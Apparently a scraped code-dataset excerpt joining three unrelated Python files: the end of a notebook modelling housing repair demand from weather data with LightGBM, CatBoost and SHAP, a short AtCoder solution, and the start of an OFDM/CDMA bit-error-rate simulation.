job_date_weather_predictors = dataset.drop(['time', 'job_report_date', 'repair_count', 'priority', 'weather_condition modified','temperature_2m_min (°C)','temperature_2m_max (°C)', 'apparent_temperature_min (°C)', 'apparent_temperature_mean (°C)', 'apparent_temperature_max (°C)', 'winddirection_10m_dominant (°)'], axis=1)\n job_date_weather_target = dataset['repair_count']\n x_train, x_cv, y_train, y_cv = train_test_split(job_date_weather_predictors, job_date_weather_target, test_size=0.2, random_state=42)\n\n # One-hot encoding categorical columns\n s = (x_train.dtypes == 'object')\n object_cols = list(s[s].index)\n\n OH_encoder = OneHotEncoder(handle_unknown='ignore', sparse_output=False)\n OH_cols_train = pd.DataFrame(OH_encoder.fit_transform(x_train[object_cols]))\n OH_cols_cv = pd.DataFrame(OH_encoder.transform(x_cv[object_cols]))\n\n OH_cols_train.index = x_train.index\n OH_cols_cv.index = x_cv.index\n\n num_X_train = x_train.drop(object_cols, axis=1)\n num_X_cv = x_cv.drop(object_cols, axis=1)\n\n OH_X_train = pd.concat([num_X_train, OH_cols_train], axis=1)\n OH_X_cv = pd.concat([num_X_cv, OH_cols_cv], axis=1)\n\n # training regressors on encoded data and calculating metrics\n metrics_scores = []\n for metric_name, metric_func in metrics.items():\n model = regressor()\n model.fit(OH_X_train, y_train)\n y_pred = model.predict(OH_X_cv)\n metric_score = metric_func(y_cv, y_pred)\n metrics_scores.append(metric_score)\n \n # storing metrics of all regressors for current dataset\n metrics_reg = {'Method': regressor.__name__, 'Dataset': dataset_name, **dict(zip(list(metrics.keys()), metrics_scores))}\n scores.append(metrics_reg)\n\n# dataframe for storing evalaution metric scores for each regressor\nscores_df = pd.concat([pd.DataFrame([score]) for score in scores], ignore_index=True)\n\n\n# In[34]:\n\n\nscores_df\n\n\n# In[35]:\n\n\npd.reset_option('max_rows')\n\n\n# In[36]:\n\n\nfig, ax = plt.subplots(figsize=(10, 6))\nax.axis('off')\nax.table(cellText=scores_df.values, colLabels=scores_df.columns, cellLoc='center', loc='center')\nplt.savefig('scores_table.png', bbox_inches='tight', pad_inches=0.5)\nplt.show()\n\n\n# In[37]:\n\n\n# sorting scores in order of decreasing R-squared\nsorted_scores_df = scores_df.sort_values(by='R2')\n# getting scores for each Classifier\nall_regressor_scores = sorted_scores_df.groupby('Method')\n\n# plotting R2 score of all regressors for each priority type\nfor regressor, regressor_scores in all_regressor_scores:\n plt.figure(figsize=(10, 6))\n plt.title(f'{regressor} - R2')\n plt.xlabel('Dataset')\n plt.ylabel('Score')\n plt.xticks(rotation=45)\n\n plt.plot(regressor_scores['Dataset'], regressor_scores['R2'], label='R2', marker='o')\n\n plt.legend()\n plt.tight_layout()\n plt.show()\n\n\n# In[38]:\n\n\n# getting best regressor\nregressor_r2 = scores_df.groupby('Method')['R2'].mean()\n# regressor with highest R2 score\nbest_regressor = regressor_r2.idxmax()\nhighest_r2 = regressor_r2.max()\n\nprint(f'The best performing Regressor is \\'{best_regressor}\\' with an average R2 score of {highest_r2:.6f}')\n\n\n# In[44]:\n\n\nlgbm_scores = scores_df[scores_df['Method'] == 'LGBMRegressor']\nmse_lgbm = lgbm_scores['MSE'].mean()\nprint(f'The best performing Regressor is \\'{best_regressor}\\' with an average MSE score of {mse_lgbm:.6f}')\nlgbm_scores\n\n\n# In[45]:\n\n\n# sorting lgbm scores\nlgbm_scores_sorted = lgbm_scores.sort_values(by = 'R2')\nlgbm_scores_sorted\n# plotting R2 squared score for each type of priority\nplt.figure(figsize=(10, 6))\nplt.title(f'LGBM Regressor - R2')\nplt.xlabel('Dataset')\nplt.ylabel('Score')\nplt.xticks(rotation=45)\n\nplt.plot(lgbm_scores_sorted['Dataset'], lgbm_scores_sorted['R2'], label='R2', marker='o')\nplt.legend()\nplt.show()\n\n\n# #### Experiment - Regression without log transforming target variable\n\n# In[46]:\n\n\n# datasets for regression corresponding to each priority type: routine, emergency, planned, cyclical, void, inspection, other\n# Non-log Transformed datasets\ndatasets = [routine, emergency, planned, cyclical, void, inspection, other]\n\nscores = []\n# list of regressors to experiment with\nregressors = [\n LinearRegression,\n KNeighborsRegressor,\n RandomForestRegressor,\n Lasso,\n ElasticNet,\n GradientBoostingRegressor,\n LGBMRegressor,\n CatBoostRegressor\n]\n\n# list of metrics to calculate for evaluating regressors\nmetrics = {\n 'MSE': mean_squared_error,\n 'R2': r2_score,\n}\n\n# creating dataFrame to store scores\nscores_df_no_transformation = pd.DataFrame(columns=['Method', 'Dataset'] + list(metrics.keys()))\n\n# iterating over regressors\nfor regressor in regressors:\n for dataset_name, dataset in zip(['routine', 'emergency', 'planned', 'cyclical', 'void', 'inspection', 'other'], datasets):\n print(f'Training {regressor.__name__} on {dataset_name}')\n\n # prediciting features and target\n job_date_weather_predictors = dataset.drop(['time', 'job_report_date', 'repair_count', 'priority', 'weather_condition modified','temperature_2m_min (°C)','temperature_2m_max (°C)', 'apparent_temperature_min (°C)', 'apparent_temperature_mean (°C)', 'apparent_temperature_max (°C)', 'winddirection_10m_dominant (°)'], axis=1)\n job_date_weather_target = dataset['repair_count']\n x_train, x_cv, y_train, y_cv = train_test_split(job_date_weather_predictors, job_date_weather_target, test_size=0.2, random_state=42)\n\n # One-hot encoding categorical columns\n s = (x_train.dtypes == 'object')\n object_cols = list(s[s].index)\n\n OH_encoder = OneHotEncoder(handle_unknown='ignore', sparse_output=False)\n OH_cols_train = pd.DataFrame(OH_encoder.fit_transform(x_train[object_cols]))\n OH_cols_cv = pd.DataFrame(OH_encoder.transform(x_cv[object_cols]))\n\n OH_cols_train.index = x_train.index\n OH_cols_cv.index = x_cv.index\n\n num_X_train = x_train.drop(object_cols, axis=1)\n num_X_cv = x_cv.drop(object_cols, axis=1)\n\n OH_X_train = pd.concat([num_X_train, OH_cols_train], axis=1)\n OH_X_cv = pd.concat([num_X_cv, OH_cols_cv], axis=1)\n\n # training regressors on encoded data and calculating metrics\n metrics_scores = []\n for metric_name, metric_func in metrics.items():\n model = regressor()\n model.fit(OH_X_train, y_train)\n y_pred = model.predict(OH_X_cv)\n metric_score = metric_func(y_cv, y_pred)\n metrics_scores.append(metric_score)\n \n # storing metrics of all regressors for current dataset\n metrics_reg = {'Method': regressor.__name__, 'Dataset': dataset_name, **dict(zip(list(metrics.keys()), metrics_scores))}\n scores.append(metrics_reg)\n\n# dataframe for storing evalaution metric scores for each regressor\nscores_df_no_transformation = pd.concat([pd.DataFrame([score]) for score in scores], ignore_index=True)\n\n\n# In[47]:\n\n\n# getting best regressor trained on non-transformed data\nregressor_r2 = scores_df_no_transformation.groupby('Method')['R2'].mean()\n# regressor with highest R2 score\nbest_regressor = regressor_r2.idxmax()\nhighest_r2 = regressor_r2.max()\n\nprint(f'The best performing Regressor on non-transformed datasets is \\'{best_regressor}\\' with an average R2 score of {highest_r2:.6f}')\n\n\n# In[49]:\n\n\nnt_scores = scores_df_no_transformation[scores_df_no_transformation['Method'] == 'CatBoostRegressor']\nmse_lgbm = nt_scores['MSE'].mean()\nprint(f'The best performing Regressor is \\'{best_regressor}\\' with an average MSE score of {mse_lgbm:.6f}\\n\\n')\nnt_scores\n\n\n# #### Conclusion - Log-transformation improves model performance\n\n# ##### True vs predicted values on CatBoost regressor for all non-transformed priority types\n\n# In[52]:\n\n\ndatasets = [routine, emergency, planned, cyclical, void, inspection, other]\ndataset_names = ['routine', 'emergency', 'planned', 'cyclical', 'void', 'inspection', 'other']\nbest_regressor = CatBoostRegressor(silent = True)\n\n\n# Loop through datasets\nfor dataset_name, dataset in zip(dataset_names, datasets):\n print(f'plots for {dataset_name}')\n \n # prepare predictors\n job_date_weather_predictors = dataset.drop(['time', 'job_report_date', 'repair_count', 'priority',\n 'weather_condition modified', 'apparent_temperature_min (°C)',\n 'apparent_temperature_mean (°C)', 'apparent_temperature_max (°C)',\n 'winddirection_10m_dominant (°)'], axis=1)\n # target - repair count\n job_date_weather_target = dataset['repair_count']\n\n # train test split\n x_train, x_cv, y_train, y_cv = train_test_split(job_date_weather_predictors, job_date_weather_target, test_size=0.2, random_state=42)\n\n # fit best regressor\n best_regressor.fit(x_train, y_train)\n\n # predictions\n pred = best_regressor.predict(x_cv)\n compare = pd.DataFrame({'y_cv': y_cv, 'pred': np.round(pred, 0)})\n \n # figure with two subplots for true vs predicted plot, and residual plot\n fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(15, 6))\n \n # plot 1: actual vs predicted\n ax1 = axes[0]\n ax1.scatter(compare['y_cv'], compare['pred'], color='blue', label='Predicted vs. True')\n ax1.plot(np.linspace(0, max(compare['y_cv']), 100), np.linspace(0, max(compare['y_cv']), 100), color='red', label='Ideal')\n ax1.set_xlabel('True Values')\n ax1.set_ylabel('Predicted Values')\n ax1.set_title(f'Actual vs. Predicted - {dataset_name.upper()}')\n ax1.legend()\n \n # plot 2: predicted vs residual\n ax2 = axes[1]\n residuals = compare['pred'] - compare['y_cv']\n ax2.scatter(compare['pred'], residuals, color='blue')\n ax2.axhline(y=0, color='red', linestyle='--')\n ax2.set_xlabel('Predicted Values')\n ax2.set_ylabel('Residuals')\n ax2.set_title(f'Predicted vs. Residuals - {dataset_name.upper()}')\n \n # adjust layout and display plots\n plt.tight_layout()\n display(fig)\n plt.close()\n\n\n# ##### True vs predicted values on LGBM regressor for all log-transformed priority types\n\n# In[56]:\n\n\ndatasets = [routine_reg, emergency_reg, planned_reg, cyclical_reg, void_reg, inspection_reg, other_reg]\ndataset_names = ['routine', 'emergency', 'planned', 'cyclical', 'void', 'inspection', 'other']\nbest_regressor = CatBoostRegressor(silent = True)\n\n\n# Loop through datasets\nfor dataset_name, dataset in zip(dataset_names, datasets):\n print(f'plots for {dataset_name}')\n \n # prepare predictors\n job_date_weather_predictors = dataset.drop(['time', 'job_report_date', 'repair_count', 'priority',\n 'weather_condition modified', 'apparent_temperature_min (°C)',\n 'apparent_temperature_mean (°C)', 'apparent_temperature_max (°C)',\n 'winddirection_10m_dominant (°)'], axis=1)\n # target - repair count\n job_date_weather_target = dataset['repair_count']\n\n # train test split\n x_train, x_cv, y_train, y_cv = train_test_split(job_date_weather_predictors, job_date_weather_target, test_size=0.2, random_state=42)\n\n # fit best regressor\n best_regressor.fit(x_train, y_train)\n\n # predictions\n pred = best_regressor.predict(x_cv)\n compare = pd.DataFrame({'y_cv': y_cv, 'pred': pred})\n \n # figure with two subplots for true vs predicted plot, and residual plot\n fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(15, 6))\n \n # plot 1: actual vs predicted\n ax1 = axes[0]\n ax1.scatter(compare['y_cv'], compare['pred'], color='blue', label='Predicted vs. True')\n ax1.plot(np.linspace(0, max(compare['y_cv']), 100), np.linspace(0, max(compare['y_cv']), 100), color='red', label='Ideal')\n ax1.set_xlabel('True Values')\n ax1.set_ylabel('Predicted Values')\n ax1.set_title(f'Actual vs. Predicted - {dataset_name.upper()}')\n ax1.legend()\n \n # plot 2: predicted vs residual\n ax2 = axes[1]\n residuals = compare['pred'] - compare['y_cv']\n ax2.scatter(compare['pred'], residuals, color='blue')\n ax2.axhline(y=0, color='red', linestyle='--')\n ax2.set_xlabel('Predicted Values')\n ax2.set_ylabel('Residuals')\n ax2.set_title(f'Predicted vs. Residuals - {dataset_name.upper()}')\n \n # adjust layout and display plots\n plt.tight_layout()\n display(fig)\n plt.close()\n\n\n# #### Tuning regressors\n# with log-transformation of target variable\n\n# Storing tuned regressors and predictions\n\n# In[58]:\n\n\n# dictionary to store predictions by lgbm regressor on each priority dataset (log transformed traget)\npredictions_dict_regressor = {}\n\ndatasets = [routine_reg, emergency_reg, planned_reg, cyclical_reg, void_reg, inspection_reg, other_reg]\n\n# defining the parameter grid for tuning\nparam_grid = {\n 'num_leaves': [10, 20, 30],\n 'max_depth': [4, 6, 8],\n 'learning_rate': [0.01, 0.1, 0.2],\n 'n_estimators': [100, 200, 300]\n}\n\n# creating an instance of LGBM Regressor\nlgbm_regressor = LGBMRegressor(random_state=42, silent = True)\n\n# creating GridSearchCV instance\ngrid_search = GridSearchCV(lgbm_regressor, param_grid, cv=5, scoring='neg_mean_squared_error')\n\n# iterating over each dataset\nfor dataset_name, dataset in zip(['routine', 'emergency', 'planned', 'cyclical', 'void', 'inspection', 'other'], datasets):\n print(f'Tuning LGBM Regressor on {dataset_name}')\n \n # features and target\n job_date_weather_predictors = dataset.drop(['time', 'job_report_date', 'repair_count', 'priority', 'weather_condition modified', 'apparent_temperature_min (°C)', 'apparent_temperature_mean (°C)', 'apparent_temperature_max (°C)', 'winddirection_10m_dominant (°)'], axis=1)\n job_date_weather_target = dataset['repair_count']\n x_train, x_cv, y_train, y_cv = train_test_split(job_date_weather_predictors, job_date_weather_target, test_size=0.2, random_state=42)\n\n # one-hot encoding categorical columns (same as before)\n s = (x_train.dtypes == 'object')\n object_cols = list(s[s].index)\n\n OH_encoder = OneHotEncoder(handle_unknown='ignore', sparse=False)\n OH_cols_train = pd.DataFrame(OH_encoder.fit_transform(x_train[object_cols]))\n OH_cols_cv = pd.DataFrame(OH_encoder.transform(x_cv[object_cols]))\n\n OH_cols_train.index = x_train.index\n OH_cols_cv.index = x_cv.index\n\n num_X_train = x_train.drop(object_cols, axis=1)\n num_X_cv = x_cv.drop(object_cols, axis=1)\n\n OH_X_train = pd.concat([num_X_train, OH_cols_train], axis=1)\n OH_X_cv = pd.concat([num_X_cv, OH_cols_cv], axis=1)\n \n # performing grid search for hyperparameter tuning\n grid_search.fit(OH_X_train, y_train)\n \n # getiing best parameters\n best_params = grid_search.best_params_\n \n # using best parameters to retrain LGBM Regressor\n best_lgbm_regressor = LGBMRegressor(**best_params, random_state=42)\n best_lgbm_regressor.fit(OH_X_train, y_train)\n \n # making predictions on test data\n y_pred = best_lgbm_regressor.predict(OH_X_cv)\n y_pred_real = np.expm1(y_pred)\n rounded_pred = np.round(y_pred_real).astype(int)\n rounded_pred[rounded_pred < 0] = 0\n\n # inverse log transformation of true values\n y_cv_real = np.expm1(y_cv)\n \n # calculating R2 and MSE scores\n r2_score_val = r2_score(y_cv, y_pred)\n mse_score_val = mean_squared_error(y_cv, y_pred)\n \n # saving best parameters, R2, and MSE scores in a dictionary\n best_results = {\n 'Best Parameters': best_params,\n 'R2 Score': r2_score_val,\n 'MSE Score': mse_score_val\n }\n \n predictions_dict_regressor[dataset_name] = {'Actual': y_cv_real, 'Predicted': rounded_pred, 'Best Results': best_results}\n \n \n\nprint('Tuning complete')\n\n\n# In[64]:\n\n\nscores_after_tuning = {}\n\n# iterating over each dataset\nfor dataset_name, dataset in zip(['routine', 'emergency', 'planned', 'cyclical', 'void', 'inspection', 'other'], datasets):\n # getting prediction results from predictions dictioanary for the current dataset\n results = predictions_dict_regressor[dataset_name]\n #print(results)\n # getting best results\n best_results = results.get('Best Results',{})\n r2_score_val = best_results.get('R2 Score', None)\n mse_score_val = best_results.get('MSE Score', None)\n \n # dataframe for storing best scores after tuning\n scores_tuned = pd.DataFrame({\n 'Dataset': [dataset_name],\n 'R2 Score': [r2_score_val],\n 'MSE Score': [mse_score_val]\n })\n scores_after_tuning[dataset_name] = scores_tuned\n\nscores_tuned = pd.concat(scores_after_tuning, ignore_index=True)\n\n# scores after hyperparameter tuning\ndisplay(scores_tuned)\n\n\n# In[65]:\n\n\nscores_tuned['R2 Score'].mean()\n\n\n# In[66]:\n\n\nscores_tuned['MSE Score'].mean()\n\n\n# #### Conclusion: No significant improvement after tuning\n\n# #### Combine plots - CatBoost Regressor & CatBoost Classifier\n\n# In[68]:\n\n\n# getting best regressor and best classifier scores for direct comparison\nlgbm_regressor_scores = scores_df[scores_df['Method'] == 'LGBMRegressor']\ncatboost_classifier_scores = metrics_df[metrics_df['Classifier'] == 'CatBoost']\nsmt_classifier_scores = metrics_smote_df[metrics_smote_df['Classifier'] == 'Random Forest']\n# sort scores by R2 for regressors and F1 Macro for classifiers\ndataset_order_reg = lgbm_regressor_scores.sort_values(by='R2')\ndataset_order_reg_tuned = scores_tuned.sort_values(by = 'R2 Score')\ndataset_order_cls = catboost_classifier_scores.sort_values(by='F1 Macro', ascending=False)\ndataset_order_cls_smt = smt_classifier_scores.sort_values(by='F1 Macro', ascending=False)\n# reordering dataset_order_cls based on the order of dataset_order_reg\ndataset_order_cls_reordered = dataset_order_cls.set_index('Dataset').loc[dataset_order_reg['Dataset']].reset_index()\ndataset_order_cls_smt_reordered = dataset_order_cls_smt.set_index('Dataset').loc[dataset_order_reg['Dataset']].reset_index()\ndataset_order_reg_tuned_reordered = dataset_order_reg_tuned.set_index('Dataset').loc[dataset_order_reg['Dataset']].reset_index()\n\n# plotting combined plot\nplt.figure(figsize=(10, 6))\n\nplt.title('Scores - LGBM Regressor (Untuned, Tuned) & CatBoost Classifier & Random Forest Classifier (on oversampled data)')\nplt.xlabel('Dataset')\nplt.ylabel('Score')\nplt.xticks(rotation=65)\n\nplt.plot(dataset_order_reg['Dataset'], dataset_order_reg['R2'], label='R2 (LGBM Regressor)', marker='o')\nplt.plot(dataset_order_cls_reordered['Dataset'], dataset_order_cls_reordered['F1 Macro'], label='F1 Macro (CatBoost Classifier)', marker='o')\nplt.plot(dataset_order_cls_smt_reordered['Dataset'], dataset_order_cls_smt_reordered['F1 Macro'], label='F1 Macro (Random Forest Classifier (smt))', marker='o')\nplt.plot(dataset_order_reg_tuned_reordered['Dataset'], dataset_order_reg_tuned_reordered['R2 Score'], label = 'R2 Tuned (LGBM Regressor)', marker = 'o')\n\n\nplt.legend()\nplt.tight_layout()\nplt.show()\n\n\n# #### Choosing best models\n\n# Choosing LGBM regresor for predicting demand for all priority types \n\n# In[69]:\n\n\nbest_regressor = LGBMRegressor()\n\n#best_classifier = CatBoostClassifier()\n\n\n# #### Retraining and storing models for SHAP analysis\n# Display predictions\n\n# In[71]:\n\n\ndatasets = [routine_reg, emergency_reg, planned_reg, cyclical_reg, void_reg, inspection_reg, other_reg]\n\n# List to store trained models\nstored_models = []\n\n# creating instance of best regressor\nbest_regressor = LGBMRegressor()\n\n# list to compare actual and predicted values\nregressor_comparison_dataframes = []\n\n# iterating over datasets\nfor dataset_name, dataset in zip(['routine', 'emergency', 'planned', 'cyclical', 'void', 'inspection', 'other'], datasets):\n print(f'Training best regression model on {dataset_name}')\n\n # features and target\n job_date_weather_predictors = dataset.drop(['time', 'job_report_date', 'repair_count', 'priority', 'weather_condition modified','temperature_2m_max (°C)','temperature_2m_min (°C)', 'apparent_temperature_min (°C)', 'apparent_temperature_mean (°C)', 'apparent_temperature_max (°C)', 'winddirection_10m_dominant (°)'], axis=1)\n job_date_weather_target = dataset['repair_count']\n x_train, x_cv, y_train, y_cv = train_test_split(job_date_weather_predictors, job_date_weather_target, test_size=0.2, random_state=42)\n\n # One-hot encoding categorical columns\n s = (x_train.dtypes == 'object')\n object_cols = list(s[s].index)\n\n OH_encoder = OneHotEncoder(handle_unknown='ignore', sparse_output=False)\n OH_cols_train = pd.DataFrame(OH_encoder.fit_transform(x_train[object_cols]))\n OH_cols_cv = pd.DataFrame(OH_encoder.transform(x_cv[object_cols]))\n\n OH_cols_train.index = x_train.index\n OH_cols_cv.index = x_cv.index\n\n num_X_train = x_train.drop(object_cols, axis=1)\n num_X_cv = x_cv.drop(object_cols, axis=1)\n\n OH_X_train = pd.concat([num_X_train, OH_cols_train], axis=1)\n OH_X_cv = pd.concat([num_X_cv, OH_cols_cv], axis=1)\n\n current_model = best_regressor\n current_model.fit(OH_X_train, y_train)\n \n # storing trained model\n stored_models.append((dataset_name, current_model)) \n \n y_pred = current_model.predict(x_cv)\n \n # inverse log transformation of predictions\n y_pred_real = np.expm1(y_pred)\n rounded_pred = np.round(y_pred_real).astype(int)\n rounded_pred[rounded_pred < 0] = 0\n\n # inverse log transformation of actual values\n y_cv_real = np.expm1(y_cv)\n \n # comparing predicted values with actual values\n compare = {'y_cv': y_cv_real.reset_index(drop = True), 'pred': rounded_pred}\n df = pd.DataFrame(compare)\n \n # adding comparison dataframe for current priority dataset to our final list\n regressor_comparison_dataframes.append(df)\n\nprint('models trained')\n\n# displaying all comparison dataframes (for all priority types)\nfor idx, df in enumerate(regressor_comparison_dataframes):\n print(f\"Predictions for regressor dataset - '{['routine', 'emergency', 'other', 'planned', 'inspection', 'void','cyclical'][idx]}':\")\n display(df)\n print('\\n')\n\n\n# In[72]:\n\n\nstored_models\n\n\n# In[74]:\n\n\n# feature importance plots\n# iterating over the stored models and datasets \nfor (dataset_name, model), dataset in zip(stored_models, datasets):\n print(f'SHAP for {dataset_name}')\n \n # features and target\n predictors = dataset.drop(['time', 'job_report_date', 'repair_count', 'priority', 'weather_condition modified', 'temperature_2m_max (°C)', 'temperature_2m_min (°C)', 'apparent_temperature_min (°C)', 'apparent_temperature_mean (°C)', 'apparent_temperature_max (°C)', 'winddirection_10m_dominant (°)'], axis=1)\n target = dataset['repair_count']\n x_train, x_cv, y_train, y_cv = train_test_split(predictors, target, test_size=0.2, random_state=42)\n \n # training LGBM regressor and getting feature importances\n model.fit(x_train, y_train)\n feature_importances = model.feature_importances_\n feature_names = x_train.columns\n\n # creating SHAP explainer\n explainer = shap.Explainer(model)\n \n # creating explanation data using the test data\n explain_data = x_cv \n \n # getting SHAP values\n shap_values = explainer(explain_data)\n # creating bar plot for feature importances\n shap.plots.bar(shap_values, show = True)\n\n\n# In[75]:\n\n\n# waterfall plots\n\nfor (dataset_name, model), dataset in zip(stored_models, datasets):\n print(f'waterfall plot for {dataset_name}')\n \n predictors = dataset.drop(['time', 'job_report_date', 'repair_count', 'priority', 'weather_condition modified', 'temperature_2m_max (°C)', 'temperature_2m_min (°C)', 'apparent_temperature_min (°C)', 'apparent_temperature_mean (°C)', 'apparent_temperature_max (°C)', 'winddirection_10m_dominant (°)'], axis=1)\n target = dataset['repair_count']\n x_train, x_cv, y_train, y_cv = train_test_split(predictors, target, test_size=0.2, random_state=42)\n \n explainer = shap.Explainer(model)\n data_for_explain = x_cv \n shap_values = explainer(data_for_explain)\n \n # creating waterfall plot for first datapoint (in each priority dataset)\n index = 0\n # title\n plt.gca().add_artist(plt.text(0.5, 1.08, f\"Waterfall plot for model trained on dataset - '{dataset_name}'\", ha='center', va='center', transform=plt.gca().transAxes))\n\n shap.plots.waterfall(shap_values[index], max_display=10, show = True) \n\n\n# In[76]:\n\n\n# summary plots\n\nfor (dataset_name, model), dataset in zip(stored_models, datasets):\n print(f'summary plot for {dataset_name}')\n \n #features and target\n predictors = dataset.drop(['time', 'job_report_date', 'repair_count', 'priority', 'weather_condition modified', 'temperature_2m_max (°C)', 'temperature_2m_min (°C)', 'apparent_temperature_min (°C)', 'apparent_temperature_mean (°C)', 'apparent_temperature_max (°C)', 'winddirection_10m_dominant (°)'], axis=1)\n target = dataset['repair_count']\n x_train, x_cv, y_train, y_cv = train_test_split(predictors, target, test_size=0.2, random_state=42)\n \n explainer = shap.Explainer(model)\n data_for_explain = x_cv \n \n shap_values = explainer(data_for_explain)\n # title\n plt.gca().add_artist(plt.text(0.5, 1.08, f\"Summary plot for model trained on dataset - '{dataset_name}'\", ha='center', va='center', transform=plt.gca().transAxes))\n # summary plot\n shap.summary_plot(shap_values)\n\n\n# In[77]:\n\n\n# force plots\nfor (dataset_name, model), dataset in zip(stored_models, datasets):\n print(f'force plot for {dataset_name}')\n \n # features and target\n predictors = dataset.drop(['time', 'job_report_date', 'repair_count', 'priority', 'weather_condition modified', 'temperature_2m_max (°C)', 'temperature_2m_min (°C)', 'apparent_temperature_min (°C)', 'apparent_temperature_mean (°C)', 'apparent_temperature_max (°C)', 'winddirection_10m_dominant (°)'], axis=1)\n target = dataset['repair_count']\n x_train, x_cv, y_train, y_cv = train_test_split(predictors, target, test_size=0.2, random_state=42)\n \n explainer = shap.TreeExplainer(model)\n data_for_explain = x_cv \n \n shap_values = explainer.shap_values(x_train.iloc[0:50, :]) \n shap_plot = shap.force_plot(explainer.expected_value, shap_values, x_train.iloc[0:50, :])\n shap.save_html(f'force_plot_{dataset_name}.html', shap_plot )\n\n\n# ### Saving models on system for deployment \n\n# In[80]:\n\n\n# best regressor\nbest_regressor = LGBMRegressor()\n\n# datasets \nregressor_datasets = [routine_reg, emergency_reg, other_reg, planned_reg, inspection_reg, void_reg, cyclical_reg]\n\n# iterating over all datasets\nfor dataset, dataset_name in zip(regressor_datasets, ['routine', 'emergency', 'other', 'planned', 'inspection', 'void', 'cyclical']):\n print(f'Processing dataset: {dataset_name}')\n \n # predictors and target\n predictors = dataset.drop(['time', 'job_report_date', 'repair_count', 'priority', 'weather_condition modified', 'apparent_temperature_min (°C)', 'apparent_temperature_mean (°C)', 'apparent_temperature_max (°C)', 'winddirection_10m_dominant (°)'], axis=1)\n target = dataset['repair_count']\n \n # getting training data\n x_train, _, y_train, _ = train_test_split(predictors, target, test_size=0.2, random_state=42)\n \n # retraining best regressor\n trained_regressor = best_regressor\n trained_regressor.fit(x_train, y_train)\n \n # model name according to cuurent priority dataset\n model_name = f'regressor_priority_{dataset_name}_model_AUG'\n \n # saving trained model using joblib\n model_filename = f'{model_name}.joblib'\n joblib.dump(trained_regressor, model_filename)\n \n print(f'{model_name} trained and saved')\n\nprint('Models saved')\n\n\n# ##### The trained models are saved as separate joblib files in the same directory where this Jupyter Notebook is located. These models are later loaded for use in a separate notebook for creating the Dash based web-application. (Please see 'Dash GCH App Final')\n\n# In[ ]:\n\n\n\n\n","repo_name":"ariyadmir/Predicting-Repairs-Demand-GCH","sub_path":"Demand for repair PRIORITY types based on WEATHER and TIME OF YEAR.py","file_name":"Demand for repair PRIORITY types based on WEATHER and TIME OF YEAR.py","file_ext":"py","file_size_in_byte":54862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21602680436","text":"from itertools import combinations\nfrom collections import Counter\n\n\nN, K = map(int, input().split())\n\nS_list = []\n\nkinds = [chr(i) for i in range(ord(\"a\"), ord(\"z\") + 1)]\n\nfor i in range(N):\n S_list.append(input())\n\nbest = set()\nfor k in range(K, N+1):\n # k個選ぶ\n patterns = combinations(S_list, k)\n for pattern in patterns:\n ans = set()\n for target in kinds:\n count = 0\n for p in pattern:\n if target in p:\n count += 1\n if count == K:\n ans.add(target)\n if len(ans) > len(best):\n best = ans\n\nprint(len(best))\n","repo_name":"lgtm-migrator/algo-practices","sub_path":"atcoder/ABC249/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73097396892","text":"import scipy.fftpack as fft\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom transmiterOfdm import TransmiterOfdm\nfrom przetwornikSP import PrzetwornikSzeregowoRownolegly\nimport utils\nfrom rozpraszaczWidma import RozpraszaczBipolarny\nfrom generatorKoduWalsha import GeneratorKoduWalsha\nfrom math import log10\nfrom decimal import *\n\ndef liczBer(konfiguracja, snr):\n\n daneBinarne = utils.generujDaneBinarne(konfiguracja.read('ileBitow'))\n \n koder = konfiguracja.budujKoder()\n bityZakodowane = koder.kodujE2E(daneBinarne)\n\n modulator = konfiguracja.stworzModulator()\n symboleBipolarne = modulator.mapuj(bityZakodowane)\n\n pSP = PrzetwornikSzeregowoRownolegly(konfiguracja.read('ileStrumieni'))\n strumienie = pSP.rozdziel(symboleBipolarne)\n \n generatorKoduWalsha = GeneratorKoduWalsha(konfiguracja.read('dlugoscKoduWalsha'))\n ciagRozpraszajacy = generatorKoduWalsha.generuj(konfiguracja.read('numerKoduWalsha'))\n \n transmiter = TransmiterOfdm()\n\n nadany = []\n for i, strumien in enumerate(strumienie):\n \n zmodulowanyStrumien = transmiter.modulujStrumien(strumien)\n rozpraszaczWidma = RozpraszaczBipolarny()\n chip = ciagRozpraszajacy[i]\n rozproszony = rozpraszaczWidma.rozpraszajBipolarne(zmodulowanyStrumien, [chip])\n\n for x in rozproszony:\n nadany.append(x)\n \n if konfiguracja.read('tylkoPrzebiegiCzasowe') == True:\n plt.subplot(2,1,1)\n plt.title(konfiguracja.read(\"tytul\"))\n plt.plot(np.real(nadany))\n plt.subplot(2,1,2)\n plt.plot(np.abs(fft.fft(nadany[:len(nadany)//2])))\n plt.show()\n return (0,0,0)\n\n odebrane = utils.awgn(nadany, snr)\n\n odebraneStrumienie = pSP.rozdziel(odebrane)\n zdemodulowane=[]\n\n for i, strumien in enumerate(odebraneStrumienie):\n rozpraszaczWidma = RozpraszaczBipolarny()\n chip = ciagRozpraszajacy[i]\n skupiony = rozpraszaczWidma.skupBipolarne(strumien, [chip])\n\n zdemodulowanyStrumien = transmiter.demoduluj(skupiony)\n zdemodulowane += zdemodulowanyStrumien\n\n if konfiguracja.read('tylkoKonstelacje') == True:\n plt.title(konfiguracja.read(\"tytul\"))\n re = [i.real for i in zdemodulowane]\n im = [i.imag for i in zdemodulowane]\n plt.xlim(left=-4, right=4)\n plt.ylim(bottom=-4, top=4)\n plt.scatter(re, im)\n plt.grid()\n plt.show()\n return (0,0,0)\n\n # dekodowanie\n bipolarneOdebrane = modulator.demapuj(zdemodulowane)\n eb,n0 = utils.liczEbN0(nadany, snr)\n\n zdekodowane = koder.dekoduj(bipolarneOdebrane, ileItracji=konfiguracja.read('ileIteracjiDekodera'), lc = eb/n0)\n\n ileBledow = 0\n assert len(zdekodowane) == len(daneBinarne)\n for z,d in zip(zdekodowane, daneBinarne):\n if z != d:\n ileBledow +=1\n ber = Decimal(ileBledow)/Decimal(len(bityZakodowane))\n return ber, 100*ber, 10*log10(eb/n0)\n \ndef iteracjaDlaKonfiga(konfiguracja):\n print(konfiguracja)\n\n snrTab = konfiguracja.getSrnTab()\n ebn0Tab = []\n wyniki=[]\n for snr in snrTab:\n ber,berProcent,ebn0 = liczBer(konfiguracja, snr)\n ebn0Tab.append(ebn0)\n\n if 